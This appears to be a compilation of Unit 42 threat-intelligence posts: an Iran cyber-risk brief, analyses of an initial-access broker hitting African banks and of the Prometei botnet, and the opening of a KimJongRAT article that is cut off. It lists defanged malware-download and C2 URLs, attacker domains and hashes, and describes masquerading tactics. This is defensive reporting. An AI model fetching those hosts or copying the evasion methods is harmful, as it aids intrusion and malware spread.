  • 76d2dd21ffaddac1d1903ad1a2b52495e57e73aa16aa2dc6fe9f94c55795a45b

Additional Resources

Threat Brief: Escalation of Cyber Risk Related to Iran (Updated June 30)

Posted on by Unit 42

Executive Summary

Unit 42 stopped monitoring this threat and updating the brief on Aug. 14, 2025.

The recent conflict involving Iran, particularly its military engagements with Israel and the U.S., significantly heightens the risk of cyber spillover. This extends traditional battlegrounds into the digital realm.

While we have not yet seen a dramatic uptick in Iranian-directed cyberattacks, further escalations could manifest as a surge in cyber operations by both state-sponsored groups and independent hacktivists. Their aim would be to disrupt, collect intelligence on or influence perceived adversaries. Iranian threat groups have a history of targeting critical infrastructure and sensitive industries across public and private enterprises globally and these attacks can have far-reaching consequences.

Over the past two years, Unit 42 has observed Iranian-backed groups and hacktivists expanding their global cyber operations, including employing the following activities:

  • Opportunistically leveraging generative AI (GenAI) for social engineering and influence operations
  • Explicitly linking destructive attacks to geopolitical events

These are in addition to activities these groups have historically been known for. It is possible these activities could further intensify in the context of recent events involving Israel and the U.S. These activities include:

  • Destructive attacks
  • Website defacements
  • Distributed-denial-of-service (DDoS) attacks
  • Data exfiltration and wiper attacks, reminiscent of those we previously observed from Iranian groups targeting the Israeli education and technology sectors

We track threat activity across the globe, with Iran as one of four major nation-state actors we monitor, alongside China, Russia and North Korea. The primary objectives of Iranian nation-state actors frequently include espionage and disruption. These groups employ a variety of tactics, techniques and procedures (TTPs), including targeted spear-phishing campaigns and the exploitation of known vulnerabilities. Specific observations include:

  • Covert infrastructure for espionage: A recent case identified by Unit 42 revealed suspected covert Iranian infrastructure impersonating a German modeling agency to conduct cyberespionage. These operations deploy fake websites to collect extensive visitor data, suggesting strategic intelligence-gathering objectives.
  • AI-enhanced social engineering: We recently observed an Iranian threat group (Agent Serpens, aka CharmingKitten) using GenAI in a malicious PDF, which it masked as a document from the U.S. non-profit research organization RAND. The group deployed this PDF alongside targeted malware.
  • Persistent destructive operations: The Iranian-backed Agonizing Serpens APT group targeted the Israeli education and technology sectors from January-October 2023, aiming to steal sensitive data like personally identifiable information (PII) and intellectual property. In these attacks, it also deployed wipers to destroy systems and hinder forensic analysis.

In the context of the ongoing geopolitical situation with Iran, we've identified four key areas of potential cyberthreat activity:

  • Iranian nation-state threat actors: In the near term, Iranian nation-state hackers are likely to leverage targeted attacks, from spear phishing emails aimed at diplomats to destructive wiper malware targeting organizations with ties to U.S. interests.
  • Hacktivists: It is likely that hacktivists supporting Iran will continue to conduct disruptive attacks and influence operations targeting U.S.-based interests both domestically and abroad. This includes DDoS attacks to disrupt internet access and influence operations on social media platforms.
  • Cybercriminal groups: These groups could opportunistically exploit global uncertainty to launch phishing campaigns, leveraging world events as a theme for malicious emails and attachments.
  • Other nation-state actors: There is a potential for other nation-state threat actors to use events to further their interests. These attacks could include false-flag operations where actors from somewhere other than Iran disguise their attacks to appear as if they originated from Iran. This was seen when Russia previously hijacked Iran’s cyber infrastructure in 2019 to piggyback into networks already compromised by Iranian actors.

Palo Alto Networks customers can receive protections from and mitigations for this threat actor activity through the following products:

The Unit 42 Incident Response team can also be engaged to help with a compromise or to provide a proactive assessment to lower your risk.

Threat Groups Discussed Agent Serpens (aka APT42), Agonizing Serpens (aka Pink Sandstorm), Boggy Serpens (aka MuddyWater), Curious Serpens (aka Peach Sandstorm), Devious Serpens (aka Imperial Kitten), Evasive Serpens, Industrial Serpens

Current Scope of Cyberattacks

Unit 42 tracks various Iranian state-sponsored actors under the constellation name Serpens. These groups could increase or escalate activity in the upcoming weeks.

State-sponsored Iranian cyber capabilities are often used to project and amplify political messaging (often using destructive and psychological tactics). These efforts are likely to focus on regional targets (e.g., Israel) as well as what they deem high-value targets (e.g., politicians, key decision-makers and other directly involved entities).

State-sponsored campaigns might target their victim’s supply-chains, critical infrastructure, vendors or providers.

The majority of the already-reported cyberattacks related to this event are intentionally disruptive denial-of-service (DoS) attacks. Third-party attackers such as hacktivists and proxy actors typically support one side or the other, aiming to negatively impact and influence the opposing side.

As of June 22, 2025, 120 hacktivist groups are reportedly active in response to these events. Other public reports indicate that both cybercriminal groups and state-supported proxy groups are also active.

DDoS appears to be the most-reported attack method, followed by destructive attacks. Samples of destructive malware like data wipers related to these events have been observed by researchers. Destructive attacks also include destroying $90 million of funds in a June 2025 crypto exchange breach.

Other data breaches and associated data leaks are intended to damage either side. Reports also indicate the targeting of operational technology (OT). These two are sometimes related, because data breaches of energy and other utility companies have also been reported in direct relation to these events.

Iranian Threat Groups Tracked by Unit 42

  • Agent Serpens (aka APT42)
    • An espionage and surveillance group focusing on Israel and the U.S., targeting dissidents, activists, journalists and other groups that are deemed to pose a risk or which protests against the Iranian government
    • Initial access: Primarily spear phishing, including credential harvesting with fake login pages, also watering hole attacks
  • Agonizing Serpens (aka Pink Sandstorm)
    • This group engages in espionage, ransomware and destructive malware attacks against targets in the Middle East, with a significant focus on attacks against Israel.
    • Initial access: Password attacks (e.g., brute force, password sprays) as well as exploitation of known vulnerabilities (followed by deployment of web shells)
  • Boggy Serpens (aka MuddyWater)
    • A cyberespionage group that provides stolen data and access to the Iranian government as well as other threat actors
    • Initial access: Spear phishing and exploitation of known vulnerabilities
  • Curious Serpens (aka Peach Sandstorm)
    • Espionage group active since 2013 targeting the aerospace, defense and energy sectors in the U.S., Middle East and Europe. The group has leveraged cloud infrastructure including Azure for C2.
    • Initial access: Broadly targeted password spray attacks or job recruitment based social engineering campaigns to deliver custom malware, including the Falsefont or Tickler backdoors. Once inside, the group is known for conducting discovery activities with tools including AzureHound and Roadtools to collect and dump data from Microsoft Entra ID.
  • Devious Serpens (aka Imperial Kitten)
    • An espionage group known for targeting IT providers in the Middle East as part of supply chain campaigns
    • Initial access: Social engineering through social media, credential spear phishing and watering-hole attacks, deploying web shells
  • Evasive Serpens (aka APT34)
    • A prolific espionage group known for broad targeting that aligns with nation-state interests
    • Initial access: Relies heavily on spear phishing, though it has also been associated with other more complex attacks such as credential harvesting campaigns and DNS hijacking
  • Industrial Serpens (aka Chrono Kitten)
    • An Iranian-proxy group associated with disruptive attacks (e.g., ransomware, wiper malware, hack-and-leak attacks) that align with state interests
    • Initial access: Social engineering to distribute Android spyware hosted on spoofed websites, password attacks (e.g. brute force, password sprays) and exploitation of known vulnerabilities

Conclusion

Given the variety of tactics that threat actors are using, a multi-layered defense is most effective as no single tool can provide complete protection against these adaptable threats. We recommend focusing on foundational security hygiene, a proven approach that provides resilient protection against a wide range of tactics.

We recommend taking the following precautions to help mitigate impact from possible attacks.

Tactical Recommendations

  • Increase response to any threat signals where possible, especially those associated with internet-facing assets such as websites, virtual private network (VPN) gateways and cloud assets
  • Ensure internet-facing infrastructure is up to date with security patches and other hardening best practices
  • Train employees on phishing and social engineering tactics and continuously monitor for suspicious activity
  • On June 30, CISA, the FBI, DoD Cyber Crime Center and NSA published a joint fact sheet, "Iranian Cyber Actors May Target Vulnerable US Networks and Entities of Interest," urging organizations to remain vigilant against potential targeted cyber operations by Iranian state-sponsored or affiliated threat actors.

Strategic Recommendations

  • Begin or update business continuity plans for any staff or assets that digital or physical attacks could disrupt
  • Prepare to validate and respond to claims of breaches or data leaks
    • Threat actors might use claims (even if they’re untrue) to embarrass or harass victims, or to disseminate political narratives

As activity is likely to continue to be intensified throughout the duration of these events, it’s important to remain vigilant to potential attacks. Hacktivists and state-supported threat actors have been opportunistic, leading to potentially unexpected sources being targeted.

We will update this threat brief as more relevant information becomes available.

How Palo Alto Networks and Unit 42 Can Help

Palo Alto Networks customers can leverage a variety of product protections and updates to identify and defend against threats related to aspects of these events.

If you think you might have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42)
  • UK: +44.20.3743.3660
  • Europe and Middle East: +31.20.299.3130
  • Asia: +65.6983.8730
  • Japan: +81.50.1790.0200
  • Australia: +61.2.4062.7950
  • India: 00080005045107

Next-Generation Firewalls and Prisma Access With Advanced Threat Prevention

Advanced Threat Prevention has an inbuilt machine learning-based detection that can detect exploits in real time.

Cortex

Cortex XDR, XSIAM and Cortex Cloud are designed to prevent the execution of known malicious malware. It is also designed to prevent the execution of unknown malware and other malicious activities using Behavioral Threat Protection and machine learning based on the Local Analysis module.

Updated June 26, 2025, at 1:34 p.m. PT to add entry on Curious Serpens to section on Iran-based threat groups tracked by Unit 42. 

Updated June 30, 2025, at 1:20 p.m. PT to update Tactical Recommendations section. 

Cybercriminals Abuse Open-Source Tools To Target Africa’s Financial Sector

Posted on by Samantha Stallings

Executive Summary

Unit 42 researchers have been monitoring a series of attacks targeting financial organizations across Africa. We assess that the threat actor may be gaining initial access to these financial institutions and then selling it to others on the dark web. Since at least July 2023, a cluster of activity we track as CL-CRI-1014 has targeted this sector.

The attackers employ a consistent playbook, using a combination of open-source and publicly available tools to establish their attack framework. They also create tunnels for network communication and perform remote administration.

These tools include:

  • PoshC2: An open-source attack framework
  • Chisel: An open-source tunneling utility
  • Classroom Spy: A remote administration tool

The threat actor copies signatures from legitimate applications to forge file signatures, to disguise their tool set and mask their malicious activities. Threat actors often spoof legitimate products for malicious purposes. This does not imply a vulnerability in the organization’s products or services.

We suspect that the threat actors behind this activity are acting as an initial access broker. We assess their goal is to create footholds in financial institutions and sell this access on darknet markets. An initial access broker is a threat actor who specializes in gaining initial access to networks and selling that access to other threat actors.

By sharing this analysis, we aim to provide cybersecurity professionals in high-risk financial and other sectors with the knowledge needed to detect and mitigate this threat.

Palo Alto Networks customers are better protected through the following products and services:

  • Cortex XDR and XSIAM
  • The Advanced WildFire machine-learning models and analysis techniques have been reviewed and updated in light of the IoCs shared in this research.
  • Advanced URL Filtering and Advanced DNS Security identify known domains and URLs associated with this activity as malicious.
  • The Unit 42 Deep and Dark Web Service assists with gaining visibility into unknown and emerging risks of content posted on the deep and dark web.

To learn about this and other ways Unit 42 can help, contact the Unit 42 Incident Response team.

Related Unit 42 Topics Finance, Cybercrime

Technical Analysis of CL-CRI-1014’s Playbook

The threat actors behind CL-CRI-1014 consistently use a specific set of tools as part of their playbook to attack the financial sector in Africa. This playbook appears to consist of a combination of open-source and freely available tools such as PoshC2, Chisel and Classroom Spy, which are advertised as penetration testing and remote administration tools.

To move laterally within the compromised environment and deploy these tools, attackers used multiple techniques, including:

Figure 1 illustrates how the threat actors used these tools to spread malware to other machines in the compromised environment and deliver additional payloads. The following sections detail how attackers used each tool.

Diagram illustrating a cybersecurity attack scenario. An attacker-controlled machine uses PsExec and Chisel to create a remote connection and bypass firewall security, respectively. It targets Machine A, delivering payloads for reconnaissance and executing further attacks. These include delivering and executing malware on Machine B via Chisel, using PsExec and PowerShell, ultimately installing Classroom Spy.
Figure 1. How the threat actor used PsExec, Chisel, PoshC2 and Classroom Spy as part of their attack playbook.

From an Agent to a Spy

Our analysis indicates that in previous campaigns, the attackers primarily used MeshAgent as their main payload for controlling compromised machines. MeshAgent is an open-source remote device management tool.

Recent attacks by this threat actor have shown a slight shift in tooling, replacing MeshAgent with a remote administration tool named Classroom Spy. Classroom Spy is marketed as computer monitoring software for schools. It has both free and commercial versions available online for multiple platforms, including Windows, macOS, Linux, iOS and Android.

Figure 2 shows how the attackers used PowerShell scripts (such as slr.ps1, sqlx.ps1, sav.ps1 and cfg.ps1) to deploy and install Classroom Spy on the targeted systems. These PowerShell scripts extracted the Classroom Spy files from a ZIP archive and installed the software as a service.

Process flowchart showing the sequence of installing and executing Classroom Spy intermediate steps and files associated with Microsoft Windows system loading, and an alert icon indicating a warning or error at the Classroom Spy step.
Figure 2. Classroom Spy installation and execution.

The threat actor likely changed the names and installation paths of the Classroom Spy binaries to hide their use of this tool in infected environments. Figure 3 shows how the attacker can rename these binaries under the “Stealth Options” tab.

During our investigation, we found Classroom Spy binaries with names such as systemsvc.exe, vm3dservice.exe and vmtoolsd.exe.

Screenshot of an Agent Configuration window with options to set or revert names of agent services and processes related to the NLCS agent and its related EXE files.
Figure 3. Stealth Options in Classroom Spy agent installation.

Classroom Spy includes the following capabilities:

  • Live monitoring of the computer screen (including taking screenshots)
  • Controlling the mouse and keyboard
  • Collecting and deploying files to and from machines
  • Logging visited webpages
  • Keylogging
  • Recording audio
  • Accessing the camera
  • Opening a terminal
  • Collecting system information
  • Monitoring and blocking applications

The Classroom Spy control panel is shown in Figure 4.

Screenshot of the control panel of Classroom Spy. There are multiple rows of buttons with icons and the options include items like Reboot, Stand by, Blank Screen and many others. There are also options to send keystrokes or open a document or start the program.
Figure 4. Classroom Spy control panel.

Behind the Mask of Forged Frameworks

The threat actor disguised the tools used in these operations as legitimate processes. This included creating an identical icon, file signature, process name and path as the legitimate file would use.

The threat actor used this method for most of the tools they deployed. Figure 5 shows an example of Chisel and PoshC2 executables masked to resemble Microsoft, Cortex and VMware products.

Three digital certificates displayed side by side. These are masked as Microsoft, Cortex and VMWare.
Figure 5. Chisel and PoshC2 executables masked as Microsoft, Cortex and VMware products.

Note that the name and logo shown are the work of a threat actor attempting to impersonate a legitimate organization and do not represent an actual affiliation with that organization. The threat actor’s impersonation does not imply a vulnerability in the legitimate organization’s products or services.

Posh Payload, Proxy and Persistence

PoshC2 is an open-source attack framework used by both penetration testers and malicious actors. This was a key tool the attackers used to execute commands and gain a foothold in compromised environments. The PoshC2 framework supports generating different implant types (PowerShell, C#.NET and Python) and comes preloaded with various attack modules.

PoshC2 Payloads

While most of the implants observed in this cluster of activity were written in C#, we also saw some implants written in PowerShell. As part of the attacks, the threat actor packed the C# PoshC2 implants with a packer written in the Nim programming language. This packer unpacked the PoshC2 binary in memory and loaded it for the purposes of execution.

The packer the attacker used on some payloads does not execute the PoshC2 implant unless the host machine is part of an Active Directory domain. This behavior likely serves as an anti-analysis mechanism.

PoshC2 as a Proxy

The threat actor stole user credentials for the infected networks and used them to set up a proxy. PoshC2 can use a proxy to communicate with a command and control (C2) server, and it appears that the threat actor tailored some of the PoshC2 implants specifically for the targeted environment. Some of the observed implants implemented the proxy feature using a hard-coded internal IP address and stolen credentials from the infected environment, as shown in Figure 6.

A screenshot of Visual Studio code editor displaying a C# programming code snippet with blurred text in two lines, highlighted by a red rectangle.
Figure 6. Code snippet from a PoshC2 executable with hard-coded username and password.

PoshC2 Persistence Mechanism

The threat actor used multiple methods on different machines to establish persistence for PoshC2. These methods included:

  • Creating a service
  • Saving a shortcut (in the form of an LNK file) to the tool in the Startup folder
  • Using a scheduled task (shown in Figure 7)

Demonstrating an awareness of the security products installed on the infected devices, in this instance the threat actor disguised the malware as a file named CortexUpdater.exe, and the scheduled task as Palo Alto Cortex Services.

Diagram in Cortex XDR showing a sequence of four computer processes. An alert icon appears next to svchost.exe. Below is a command line script related to 'Palo Alto Cortex Services' with schedule and run details.
Figure 7. The attackers create a scheduled task for PoshC2 disguised as a file named CortexUpdater.exe.

Chiseling for a Tunnel

To conceal their operations within infected networks, the attackers deployed a tool called Chisel. It appears that the attackers used Chisel as a proxy to bypass network controls such as firewalls.

Chisel is an open-source tunneling utility based on a client-server architecture. When executed on a victim’s machine, Chisel’s client connects to an attacker-operated Chisel server. The victim’s machine then functions as a proxy, forwarding network communication from the server to other remote machines.

Figure 8 shows a PoshC2 implant executing Chisel as a SOCKS proxy. A SOCKS proxy is a server that uses the SOCKS protocol to forward traffic from one machine to a remote server, thus hiding the IP address of the host machine.

Flowchart diagram in Cortex XDR depicting the sequence of a cybersecurity attack involving various computer programs and components. It features graphical elements like circles and connecting lines, along with specific program names, with additional details like URL paths and parameters.
Figure 8. PoshC2 implant executes Chisel as a SOCKS proxy.

Conclusion

This report highlights the CL-CRI-1014 cluster of activity targeting multiple financial institutions across Africa. We assess that the goal of this activity is to serve as an initial access broker, maintaining and selling access to compromised networks.

CL-CRI-1014’s playbook consists of a combination of open-source and publicly available tools. The attacker employed various methods for evading detection, including:

  • Using packers
  • Signing their tools with stolen signatures
  • Using icons from legitimate products

We encourage organizations to incorporate the findings of this research into their threat hunting and defensive efforts to more effectively detect and mitigate these types of threats.

Palo Alto Networks Protection and Mitigation

Palo Alto Networks customers are better protected from the threats discussed above through the following products:

  • Cortex XDR and XSIAM
  • The Advanced WildFire machine-learning models and analysis techniques have been reviewed and updated in light of the IoCs shared in this research.
  • Advanced URL Filtering and Advanced DNS Security identify known domains and URLs associated with this activity as malicious.
  • The Unit 42 Deep and Dark Web Service assists with gaining visibility into unknown and emerging risks of content posted on the deep and dark web, informs organizations about the exposure of sensitive information, and helps reduce the time between detection and response.

To learn about this and other ways Unit 42 can help, contact the Unit 42 Incident Response team or call:

  • North America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42)
  • UK: +44.20.3743.3660
  • Europe and Middle East: +31.20.299.3130
  • Asia: +65.6983.8730
  • Japan: +81.50.1790.0200
  • Australia: +61.2.4062.7950
  • India: 00080005045107

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Indicators of Compromise

SHA256 Hashes for PoshC2 (Packed)

  • 3bbe3f42857bbf74424ff4d044027b9c43d3386371decf905a4a1037ad468e2c
  • 9149ea94f27b7b239156dc62366ee0f85b0497e1a4c6e265c37bedd9a7efc07f
  • a41e7a78f0a2c360db5834b4603670c12308ff2b0a9b6aeaa398eeac6d3b3190
  • 0bb7a473d2b2a3617ca12758c6fbb4e674243daa45c321d53b70df95130e23bc
  • 14b2c620dc691bf6390aef15965c9587a37ea3d992260f0cbd643a5902f0c65b
  • 9d9cb28b5938529893ad4156c34c36955aab79c455517796172c4c642b7b4699
  • e14b07b67f1a54b02fc6b65fdba3c9e41130f283bfea459afa6bee763d3756f8
  • a61092a13155ec8cb2b9cdf2796a1a2a230cfadb3c1fd923443624ec86cb7044
  • 7e0aa32565167267bce5f9508235f1dacbf78a79b44b852c25d83ed093672ed9
  • d81a014332e322ce356a0e2ed11cffddd37148b907f9fdf5db7024e192ed4b70
  • d528bcbfef874f19e11bdc5581c47f482c93ff094812b8ee56ea602e2e239b56
  • f1919abe7364f64c75a26cff78c3fcc42e5835685301da26b6f73a6029912072
  • 633f90a3125d0668d3aac564ae5b311416f7576a0a48be4a42d21557f43d2b4f

SHA256 Hashes for Chisel

  • bc8b4f4af2e31f715dc1eb173e53e696d89dd10162a27ff5504c993864d36f2f
  • 9a84929e3d254f189cb334764c9b49571cafcd97a93e627f0502c8a9c303c9a4
  • 5e4511905484a6dc531fa8f32e0310a8378839048fe6acfeaf4dda2396184997
  • e788f829b1a0141a488afb5f82b94f13035623609ca3b83f0c6985919cd9e83b
  • 2ce8653c59686833272b23cc30235dae915207bf9cdf1d08f6a3348fb3a3e5c1

SHA256 Hashes for Classroom Spy Files

  • 831d98404ce5e3e5499b558bb653510c0e9407e4cb2f54157503a0842317a363
  • f5614dc9f91659fb956fd18a5b81794bd1e0a0de874b705e11791ae74bb2e533
  • aed1b6782cfd70156b99f1b79412a6e80c918a669bc00a6eee5e824840c870c1
  • 6cfa5f93223db220037840a2798384ccc978641bcec9c118fde704d40480d050
  • 831d98404ce5e3e5499b558bb653510c0e9407e4cb2f54157503a0842317a363

Domains

  • finix.newsnewth365[.]com
  • mozal.finartex[.]com
  • vigio.finartex[.]com
  • bixxler.drennonmarketingreviews[.]com
  • genova.drennonmarketingreviews[.]com
  • savings.foothillindbank[.]com
  • tnn.specialfinanceinsider[.]com
  • ec2-18-140-227-82.ap-southeast-1.compute.amazonaws[.]com
  • c2-51-20-36-117.eu-north-1.compute.amazonaws[.]com
  • flesh.tabtemplates[.]com
  • health.aqlifecare[.]com
  • vlety.forwardbanker[.]com

Resurgence of the Prometei Botnet

Posted on by Samantha Stallings

Executive Summary

In March 2025, Unit 42 researchers identified a wave of Prometei attacks. Prometei refers to both the botnet and the malware family used to operate it.

This malware family, which includes both Linux and Windows variants, allows attackers to remotely control compromised systems for cryptocurrency mining (particularly Monero) and credential theft. This article focuses on the resurgence of the Linux variant.

Prometei is under active development, incorporating new modules and methods into its capabilities. The latest Prometei versions feature a backdoor that enables a variety of malicious activities. Threat actors employ a domain generation algorithm (DGA) for their command-and-control (C2) infrastructure and integrate self-updating features for stealth and evasion.

This article presents a static analysis of Prometei malware versions three and four, highlighting key functional differences from version two.

Palo Alto Networks customers are better protected from the Prometei botnet through our Network Security solutions. These include Advanced WildFire, Advanced Threat Prevention, Advanced URL Filtering and Advanced DNS Security. Coverage can also be provided through our Cortex line of products including Cortex XDR and Cortex XSIAM.

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.

Related Unit 42 Topics Cryptominers, Linux

History of the Prometei Botnet

Cybersecurity researchers first identified the Prometei botnet in July 2020, with its Windows version being the primary focus at the time. The Linux version of the botnet was subsequently identified in December 2020. The latest variants of the Prometei Linux botnet, first observed in March 2025, will be discussed in greater detail in this article.

Prometei has a history of exploiting various vulnerabilities. It uses techniques such as brute-forcing credentials, leveraging EternalBlue (the infamous Windows exploit linked to the WannaCry ransomware) and exploiting Server Message Block (SMB) protocol flaws to spread laterally within networks.

Prometei employs a DGA and self-updating features to create resilient and adaptive malware. It uses a DGA to dynamically generate domain names to ensure uninterrupted communication with its C2 infrastructure, even if some domains are blocked. Self-updating capabilities allow the malware to evolve, adapt to security defenses and deliver new payloads, while maintaining stealth and evading detection. Together, these strategies make the malware more persistent and harder to combat.

While its primary goal is cryptocurrency (Monero) mining, Prometei also possesses secondary capabilities, such as stealing credentials and deploying additional malware payloads. We assess that Prometei's operations appear driven by financial gain, and there is no evidence of ties to nation-state actors.

Prometei's architecture is modular, meaning it is built from multiple independent components, each responsible for a specific function. These modules work together to accomplish the botnet's objectives. For example, it has modules for the following activities:

  • Brute-forcing administrator credentials
  • Exploiting vulnerabilities
  • Mining cryptocurrency
  • Stealing data
  • Communicating with C2 servers

This modular design makes Prometei highly adaptable, as individual components can be updated or replaced without affecting the overall botnet functionality. It operates in multiple stages in the order listed below, which typically include the following:

  • Initial Exploitation
  • Payload Delivery
  • Lateral Movement
  • Cryptocurrency Mining
  • Data Stealing
  • C2 Communication

New Activity Timeline

We have been tracking this new wave of Prometei activity since March 2025. Figure 1 presents a timeline depicting the sample count of the Prometei botnet from late March-late April 2025.

Bar chart showing the count of events over time for Prometei samples. Dates on x-axis range from late March 2025 to late April 2025. Unit 42 and Palo Alto Networks logo lockup.
Figure 1. Timeline of Prometei botnet samples observed.

Technical Analysis

The Prometei botnet malware is distributed via an HTTP GET request to hxxp[://]103.41.204[.]104/k.php?a=x86_64.

A slight variation, hxxp[://]103.41.204[.]104/k.php?a=x86_64,<PARENT_ID> returns the malware sample with an extra ParentID field value populated with the <PARENT_ID> value. This allows the attacker to dynamically assign a ParentID value to the malware sample. Here, <PARENT_ID> is used as a placeholder.

This URL is not restricted by geographic location; it serves the same malware sample file, with a randomized configuration each time. The HTTP response headers indicate that this server is an Apache PHP server running on a Windows platform. The server IPv4 address belongs to the network operated by Infinys Network (Autonomous System Number (ASN): 58397), based in Jakarta, Indonesia.

Later versions of this malware released in March 2025 are packed using Ultimate Packer for eXecutables (UPX). Version two, which was released in 2021, did not use this technique.

UPX is used to compress the executable, making it smaller and potentially more difficult to analyze. The malware itself is a 64-bit executable and linkable format (ELF) file, indicating it's designed to run on Linux-based systems.

Despite the file being named k.php, it is not a PHP script, likely a tactic to further disguise its true nature. In version two, malware authors named the corresponding file uplugplay.

The UPX-packed executable infects compromised systems by decompressing itself in memory during runtime. After decompression, the actual malicious payload is executed, allowing the botnet to begin its operations.

Unpacking Prometei for Static Analysis

Static malware analysis is a process of examining a malware sample without running or executing the file. In this case, because of the way this file is structured, we need to perform some extra operations to unpack this file for analysis. Attempting to use the standard UPX tool's decompression command-line option (i.e., upx -d) to restore the original file for further analysis will not successfully unpack it.

The UPX tool will fail because it relies on specific metadata, including a valid PackHeader and overlay_offset trailer, to identify and decompress UPX-packed files as shown in Figure 2. The presence of a custom configuration JSON trailer appended to the malware disrupts this process, causing the UPX tool to incorrectly determine that the file is not a valid UPX archive.

Image displaying a hexadecimal code and ASCII characters on a black background in a colorful, segmented format.
Figure 2. Interpretation of the UPX PackHeader and overlay_offset trailer for the sample.

Interpretation (note that bytes are formatted in little-endian order):

  • 55 50 58 21: magic constant
  • 0E: version
  • 16: format
  • 08: method
  • 07: level
  • B8 8F 14 BF: uncompressed Adler-32 checksum
  • 4B 74 01 2A: compressed Adler-32 checksum
  • F0 08 13 00: uncompressed length
  • C4 A6 06 00: compressed length
  • F0 08 13 00: original file size
  • 49: filter id
  • 22: filter_cto
  • 00: filter_misc / n_mru
  • 4B: header checksum
  • F4 00 00 00: overlay_offset

The configuration JSON trailer must be stripped before using the UPX tool to unpack the sample file for analysis. After unpacking, the configuration JSON must be re-attached to the sample file for the malware to use those values during execution.

The sample contains a subroutine to search for and parse the configuration JSON trailer. Table 1 below compares the supported fields in versions two, three and four.

Version 2 Versions 3 and 4
Fields
  • config
  • id
  • enckey
  • config
  • id
  • enckey
  • ParentId
  • ParentHostname
  • ParentIp
  • ip

Table 3. Comparison of supported fields in the configuration JSON trailer between version two, and versions three and four.

The sample also contains another subroutine responsible for collecting compromised system information. This information includes:

  • Processor information (obtained from /proc/cpuinfo)
  • Motherboard information (obtained using the dmidecode --type baseboard command)
  • Operating system information (obtained from /etc/os-release or /etc/redhat-release)
  • Information about how long the system has been running (obtained using the uptime command)
  • Kernel information (obtained using the uname -a command)

The collected system information is submitted via HTTP GET to the C2 server at hxxp://152.36.128[.]18/cgi-bin/p.cgi.

For a more comprehensive understanding of the Prometei botnet and its evolution you can read the 2021 article IoT Malware Journals: Prometei (Linux). This more recent article, Communication with a Prometei C2, provides a detailed analysis of its newer capabilities.

Conclusion

This research has detailed the resurgence of the Prometei botnet, highlighting its continued evolution and the techniques it employs to evade detection. The new version of the Prometei botnet malware family can be detected with a YARA rule that identifies UPX and the configuration JSON trailer, a detection method that is likely to remain effective. However, as Prometei continues to evolve, security teams must remain vigilant and proactively adapt their defenses.

Palo Alto Networks Protection and Mitigation

Palo Alto Networks customers are better protected from the threats discussed above through the following products:

  • The Advanced WildFire machine-learning models and analysis techniques have been reviewed and updated in light of the IoCs shared in this research.
  • Advanced Threat Prevention has an inbuilt machine learning-based detection that can detect exploits in real time.
  • Cortex XDR and XSIAM are designed to prevent the execution of known malicious malware, and also prevent the execution of unknown malware using Behavioral Threat Protection and machine learning based on the Local Analysis module.
  • Advanced URL Filtering and Advanced DNS Security identify known domains and URLs associated with this activity as malicious.

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42)
  • UK: +44.20.3743.3660
  • Europe and Middle East: +31.20.299.3130
  • Asia: +65.6983.8730
  • Japan: +81.50.1790.0200
  • Australia: +61.2.4062.7950
  • India: 00080005045107

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Indicators of Compromise

Malware samples

Version SHA-256 Hash
v2.87X 46cf75d7440c30cbfd101dd396bb18dc3ea0b9fe475eb80c4545868aab5c578c
v3.05L cc7ab872ed9c25d4346b4c58c5ef8ea48c2d7b256f20fe2f0912572208df5c1a
v4.02V 205c2a562bb393a13265c8300f5f7e46d3a1aabe057cb0b53d8df92958500867
v4.02V 656fa59c4acf841dcc3db2e91c1088daa72f99b468d035ff79d31a8f47d320ef
v4.02V 67279be56080b958b04a0f220c6244ea4725f34aa58cf46e5161cfa0af0a3fb0
v4.02V 7a027fae1d7460fc5fccaf8bed95e9b28167023efcbb410f638c5416c6af53ff
v4.02V 87f5e41cbc5a7b3f2862fed3f9458cd083979dfce45877643ef68f4c2c48777e
v4.02V b1d893c8a65094349f9033773a845137e9a1b4fa9b1f57bdb57755a2a2dcb708
v4.02V d21c878dcc169961bebda6e7712b46adf5ec3818cc9469debf1534ffa8d74fb7
v4.08V d4566c778c2c35e6162a8e65bb297c3522dd481946b81baffc15bb7d7a4fe531

URLs

Purpose URL
Malware distribution hxxp://103.41.204[.]104/k.php
C2 hxxp://152.36.128[.]18/cgi-bin/p.cgi

Additional Resources

 

Exploring a New KimJongRAT Stealer Variant and Its PowerShell Implementation

Posted on by Dominik Reichel

Executive Summary

This article provides a comprehensive analysis of two new variants of the KimJongRAT stealer. We combine our new research findings with existing knowledge to provide a comprehensive resource for understanding and combating these new KimJongRAT variants.

The KimJongRAT stealer was first described in 2013 by the Malware.lu CERT [PDF]. We documented another variant of this family in 2019.

One of the new variants uses a Portable Executable (PE) file and the other uses a PowerShell implementation. The PE and PowerShell variants are both initiated by clicking a Windows shortcut (LNK) file that downloads a dropper file from an attacker-controlled content delivery network (CDN) account. The PE variant’s dropper deploys a loader, a decoy PDF and a text file. The dropper in the PowerShell variant deploys a decoy PDF file along with a ZIP archive.

The loader downloads more malicious files, including the stealer component for KimJongRAT.

The PowerShell variant's dropper file deploys a decoy PDF file and a ZIP archive containing scripts that include the KimJongRAT PowerShell-based stealer and keylogger components.

Both variants are designed to gather and transfer victim information and browser data, including from crypto-wallet extensions, to the attacker’s server. The PE variant also collects FTP and email client information.

The infection sequence uses a multi-file approach and a legitimate CDN service to mask its malicious activities.

Palo Alto Networks customers are better protected from the malware samples described in this article through Advanced WildFire, Advanced URL Filtering, Advanced DNS Security and Advanced Threat Prevention. Cortex XDR and XSIAM are designed to prevent the execution of known malicious malware, and also prevent the execution of unknown malware using Behavioral Threat Protection and machine learning based on the Local Analysis module.

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.

Related Unit 42 Topics PowerShell, Backdoor

New KimJongRAT PE Variant

This section details the new KimJongRAT variant that uses PE files as final payloads.

